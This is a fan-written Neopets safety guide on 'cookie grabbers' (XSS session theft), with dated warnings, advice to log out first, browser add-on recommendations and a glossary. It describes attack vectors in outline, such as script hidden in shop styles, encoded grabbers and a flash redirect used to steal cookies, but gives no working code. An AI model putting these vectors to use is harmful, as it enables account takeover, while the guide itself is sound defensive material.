Welcome to the in-depth guide to avoiding cookie grabbers. This page has been generated from background information of how it works, reverse engineering of various CG scripts and 1st hand research. (plus losing 800k + trades along the way, but hey, it's priceless!!)

CG'd? 1. Log out. 2. Log in. 3. Change word. 4. Done. Why? Click here

Frozen? Click here for details


Questions? Please neomail/webmail(dmitri_stanislaus) or contact me on NeoMallers (saudor)

NOTICE: If you are unable to see the images on this page after installing requestpolicy, you would either have to allow requests from neopets.com to neomallers.com or view this page in a browser not associated with neopets, since the images are hosted on the NeoMallers servers.

Windows 10 The F8 method to get into safe mode does not work nicely under Windows 10 - especially if you're running an SSD as your boot drive. You will need to do it through the windows environment. (Click start -no_html_comments- type in MSCONFIG. Select the BOOT TAB. Check "SAFE BOOT") Restart. Dont forget to switch it back when you are done.

Dec 2015 Added links to NoScript configuration petpage to the useful links section.

Nov 2015: Don't be clicking links There appears to be another round of exploits (possibly related with flash) Some users have reported being sent links such as "click the link to see my offer on your trades", etc. Flashblock along with the regular gear (requestpolicy, noscript) is recommended if you decide to visit UL/petpages/etc.

Sept 2014: NF Requests/Items: Keep both of them blocked dont visit lookups/user pages when a user you DONT KNOW sends you guild invitiations, NF requests, or items.

Jul 2012: Neomail: Switch to plain text neomail if you haven't already done so at this link

Aug 2011: PINs: If you have not changed your pin since August 2011, it is strongly recommended to change it now. If you changed it after August 2011, you should probably still change it (and make sure the email on your account is secured. Services like Google Mail offer IP address tracking that logs unauthorized access from other IPs - just remember your own. It may change slightly from time to time but when you look it up on services like whoisdomain tools, it should still show your internet service provider.)

June 18/2011: DUPED ITEM CGs: Source: Neoboards. Users are asked to search on google claiming that there is a list that shows list of duped items Sample: Google -removed for your safety- (WITH QUOTES!) and click on the first neopets.com result. It's a list of users selling duped items and duped items to watch out for! This is a HUGE problem right now!

August 31/2010: Neoboard CGs: Using an image tag, CGs are being posted on the neoboard topics. Requestpolicy should keep you safe from these but regardless, be wary of board topics that "invite" you in

August 21/2010: 'Inventory': Some users are reporting inventory items disappearing/being sent to others so it is advisable to keep valuables in SDB/gallery.

August 8/2010: 'Eye frame' based CGs: be wary of people that neomail you things like "I heard you might be interested. Check my gallery" or "check my trades" Some form of CG probably on lookup and in gallery.

August 8/2010: 2nd wave? CGs are on the move again. This time, encoding the CG code. Again, probably wont run correctly in firefox, but IE will execute it.

July 27/2010: RequestPolcy vs Noscript. Both or just one? More details on the requestPolicy addon has been added here. Also a glossary has been added too.

July 26/2010: What do if you're frozen added to useful links... With the new ticket system, getting an account back might not be so obvious. See below for more details. Link to an external NoScript Guide added in NoScript section.

July 25/2010: Filters Updated.... Yesterday, tnt has updated the filters. Opening and closed quotes are now required at every link. Offsite based CG links seem to be still happening however. But it's still progress.

July 21/2010: Request Policy FF addon.... TIPs on using this add-on correctly has been added! Please see here

July 20/2010: Jhudora.... Do not go to a site with jhudora in the name. It's a php/image based CG. They will say your lookup has been stolen, etc and that you should check it out, etc.

July 17/2010: REQUESTPOLICY FF Add-on: See below. *** This is a must! NoScript alone wont help you. *****

July 16/2010: On-site cookie grabbers: Yep Onsite cookie grabbers are back. The code is embedded directly in the shop itself. And noscript will probably not save you (because you would have whitelisted neopets.com and not doing so is against the toc) so it's best not to snipe at this time. This one is embeded within the width property of a style / tag.

It probably won't work on firefox browsers, etc, judging from its rather, invalid cod, but will run on Internet explorer.

July 12/2010: ARMOURED NEGG: Be careful of really cheap armoured neggs! A real one is masked underneath a fake armoured negg that links to a CG site. they show up normally on the wiz but cannot be bought if you click on it because of the invisble linked layer above it) But if you know how to edit the source code on-the-fly, you can still buy it to remove it from the ssw (so others wont get CGed). Don't attempt this unless you know what you are doing.

Table of Contents

- Why you should log out, not change PW first

- Strongly recommended firefox addons

- Some useful links

- RequestPolicy vs. NoScript

- General Internet Safety

- Glossary of Key Terms used in this guide

- Support this page

A sample shop with CG

For more details on cookie grabbing on xss, please see the section on RequestPolicy.
cookies grabber in shops -

Why you should log out first, NOT change pw first

- neopets authentication is based on session ids. Clicking LOGOUT deletes the session from the neo server, which renders the cookie (including all copies of it useless) Re-logging in creates a new session but does not delete previous sessions if the logout link is not clicked beforehand.
(Try the two browser trick - log into your account on two browsers. You can browse around on both for a bit. Now click logout on one, and your other browser gets logged out too.) Basically everyone gets kicked out.

The hacker, if inside your account, would be logged out too and in order to re-enter, would need
to decode the pw (if it's still encrypted within the cookie) to regain access. This is ample time for you to log back
in and change your pw. In most cases, it's easier for him to just move on to the next account in the list.

If you chose to pw change first, while you're doing it, the hacker would still have access.Trying to change your pw under pressure is no easy business. Time to log out = faster than (time to think of a new pw + change pw + entering it twice)

P.S. Clearing cookies don't work either. All it does is remove cookies from your own system. Not anywhere else.

+ strongly Recommended firefox add-ons

A word of advice: Installing these addons can make your browsing experience somewhat annoying (since you have to constantly allow access to trusted websites as you visit them (a huge pain when you are researching for example - where most of the websites you visit are untrusted/new to the addons)... but even then, more advanced sites (such as facebook apps) may still have difficulty loading properly. What you can do is use two browsers - Firefox when you need to visit user pages (or neopets in general), and Google Chrome for your other browsing activities. Then use a free tool like Xmarks so your bookmarks sync and are available from both browsers.

1. Noscript- required

THE LONG AND THE SHORT OF IT: Don't forget to whitelist neopets.com and any other sites that you trust (see attachment)

Neopets may freeze your account for cheating if you restock while disabling jscript. An easy way to check to see if you have properly configured it is (1) Install Noscript. Go to your inventory and click on an item. You will notice that nothing pops up. This means it is activated and scripts are being blocked. (2) Now configure as outlined below and check again. If the item description pops up, you're good to go!
If a page you rarely visit isnt working properly, temporarily allow it as shown below. More details and how to configure it on this page here

The NoScript Firefox extension provides extra protection for Firefox, Flock, Seamonkey and other mozilla-based browsers: this free, open source add-on allows JScript, Java and Flash and other plugins to be executed only by trusted web sites of your choice (e.g. your online bank), and provides the most powerful Anti-XSS protection available in a browser.

NoScript's unique whitelist based pre-emptive script blocking approach prevents exploitation of security vulnerabilities (known and even not known yet!) with no loss of functionality...

You can enable JScript, Java and plugin execution for sites you trust with a simple left-click on the NoScript status bar icon (look at the picture), or using the contextual menu, for easier operation in popup statusbar-less windows.

Source: Noscript Homepage

2. FLASHBLOCK - strongly recommended

This allows you to selectively load adobe flash player objects. If you need flash to play games,
simply click the arrow to enable that object. This is allowed since most browsers don't even come with flash. Do not
whitelist neopets as one type of CG uses a redirection of http://images.neopets.com/flash_version_check_v1.swf? to steal cookies.

Tip: You should whitelist that video site :)

3. KEYSCRAMBLER - not required against xss

For protection against key loggers (programs that record everything you type) It's no use
changing your pw if every key you press is being sent to the "hacker

4. ADBLOCK - not required against xss

It allows you to block ads... STYLISH is good too (code to block ads coming soon) If you get a pop up ad, use CTRL+W
to close it. You definitely dont want to find yourself clicking close on a XP antispyware 2009 pop up ad. Those are the worst to get rid of.


THE LONG AND THE SHORT OF IT: IF A VALID PAGE is not showing up properly, right click an empty area of the page and whitelist blocked destinations that you TRUST. Do NOT select 'Allow requests from neopets.com' as this will allow everything on the page to get through, which defeats the purpose.Basically, this plugin can be used in its default state!

RequestPolicy is an extension that improves the privacy and security of your browsing by giving you control over when cross-site requests are allowed by webpages you visit.

Cross-site requests are requests that your browser is told to make by a website you are visiting to a completely different website. Though usually legitimate requests, they often result in advertising companies and other websites knowing your browsing habits, including specific pages you view throughout the day. Among the attacks that cross-site requests are used in, they are particularly dangerous with Cross-Site Request Forgery (CSRF) attacks where your browser is told to make a request to another website and that other website thinks you (the person) meant to make the request.

With RequestPolicy, the default for any cross-site request is to deny it. Users are notified when requests on the current page have been blocked (the status bar flag icon at the bottom right of your browser turns red). Clicking on this status bar flag icon gives you a menu where you can view and modify which requests are blocked and allowed. You can whitelist requests you approve of by origin site, destination site, or specific origin-to-destination.

Which kinds of requests are blocked? (source: requestpolicy homepage)

By default, any request the browser makes from the current site a user is on to a third-party site is blocked. Users can then whitelist specific sites (with various levels of granularity) to allow requests they approve of. The types of requests that are blocked include:

Content of the current page that is from a different site.

Various tags in an HTML page tell the browser that more content is needed to display the current page. Normally, the browser immediately makes requests to third-party sites to obtain this content. The content can include images, JScript files, style sheet files, and many others.

Redirections from the current site to a different site.

Redirects tell your browser to load an entirely different website address than the one you are on or requested. Redirections can be caused by JScript, META refresh tags, and Location headers.

RequestPolicy vs NoScript - source: requestpolicy home page

Is RequestPolicy an alternative or competitor to NoScript?

No! :)

NoScript is a tool that gives you a default deny policy for JScript, Java, Flash and other plugins. NoScript allows you to whitelist scripts and objects from domains you trust.

RequestPolicy is a tool that gives you a default deny policy for cross-site requests. RequestPolicy allows you to whitelist cross-site requests you trust.

How does RequestPolicy help you where NoScript does not? RequestPolicy will protect you from various attacks that NoScript will not (such as CSRF attacks, though there some special cases that NoScript protects against) and will give you greater privacy while browsing.

Also, RequestPolicy will give you finer-grained control over JScript and plugins when you use it with NoScript. For example, if you whitelist a domain with NoScript to allow it to run JScript, then that domain will also be allowed to run JScript when you are on any other site that you have whitelisted with NoScript. RequestPolicy makes sure that when it is JScript from a third-party site, it will still be restricted unless you have allowed those cross-site requests.

Conversely, NoScript gives you protection that RequestPolicy does not. RequestPolicy will not keep you safe from malicious JScript or vulnerable plugins on the current site you are visiting, So, NoScript is absolutely essential for browser security.

Having two separate tools that each do their specific jobs well is the best approach. NoScript is an amazing extension and is absolutely essential (like RequestPolicy) to using Firefox securely. It is best to use both RequestPolicy and NoScript.

+ Some Useful Links

http://www.neopets.com/~ShimmeringBliss (Stuff you should know about your account in case you need to get it unfrozen)

http://www.neopets.com/remacct.phtml (Self Ice Link)

http://www.neopets.com/~Skiizzy - CGing Traps and other warning signs to watch out for!

http://www.neopets.com/~Sicano - NoScript Guide and configuration

Neomail me if you know of any other pages that should be here -thanks!

Frozen? What to do

From the NeoMallers Forums

If you used the ticket system, hopefully you did it correctly.
then click submit a ticket
select Account inquiries, click submit a ticket
Click My answer is not here
Select issue: Frozen Account.

Note: Use a SIDE account so you can see the response to your ticket

+ General Internet Safety

Food for Thought:Good Lightweight anti-spyware Tools:

1. Comodo Firewall This gets annoying at times, but I do not really find much use for this once you have requestpolicy+noscript

2. Super(r) Antispyware (use the portable version and reboot in WINDOWS SAFE MODE
for BEST effect if you are infected) - it's better than the actual program since it downloads with a random file name. Viruses love to disable the main program file of popular AVs like Norton and AVG.

To boot in safe mode:
Just about when windows displays the boot up progress bar/windows bootup logo, keep press F8 and select
safe mode

Tip: Periodically press F8 when the computer manufacturer
screen disappears

Glossary - summary sourced from Wiki

Cookie: A cookie, also known as a web cookie, browser cookie, and HTTP cookie, is a piece of text stored by a user's web browser. A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data.


Cross-site scripting (commonly known as CGing) holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.


Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF ("sea-surf"[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.[like neopets for example] Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

For example, one user, Bob, might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references a script on Bob's bank's website (rather than an image file), e.g.,

If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.

A cross-site request forgery is a confused deputy attack against a Web browser. The deputy in the bank example is Bob's Web browser which is confused into misusing Bob's authority at Mallory's direction.


A firewall is a part of a computer system or network that is designed to block unauthorized access while permitting authorized communications. It is a device or set of devices which is configured to permit or deny computer applications based upon a set of rules and other criteria.

Support this page

the lolz - with regards to this page